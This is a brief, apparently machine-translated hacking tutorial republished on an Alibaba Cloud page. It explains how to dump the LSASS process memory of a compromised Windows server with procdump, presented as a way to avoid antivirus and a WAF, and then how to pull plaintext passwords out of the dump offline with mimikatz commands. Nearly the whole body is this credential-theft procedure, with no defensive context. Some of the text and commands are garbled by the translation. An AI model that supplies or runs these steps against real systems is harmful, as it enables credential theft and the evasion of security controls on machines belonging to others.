Mimikaz Crawl Windows plaintext password under WAF

Source: Internet
Author: User

When we get the target server, we usually use artifact Mimkaz to fetch the clear-text password of the target server, but if the target server is configured Waf,mimikaz cannot crawl, it is possible to download the DMP file with account password to local to use Mimikaz crawl.

Realize the same system environment as the target machine. Then use the following command to download the DMP file;

Procdump.exe-accepteula-ma Lsass.exe%computername%_lsass.dmp

This procdump.exe is a tool in the Microsoft Toolkit, will not be anti-virus ban, after the DMP downloaded, using a few two Mimikaz command, you can grab the Windows plaintext password

Mimikatz # Sekurlsa::minidump LSASS. Dmpmimikatz # Sekurlsa::logonpasswords Full

Mimikaz Crawl Windows plaintext password under WAF

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.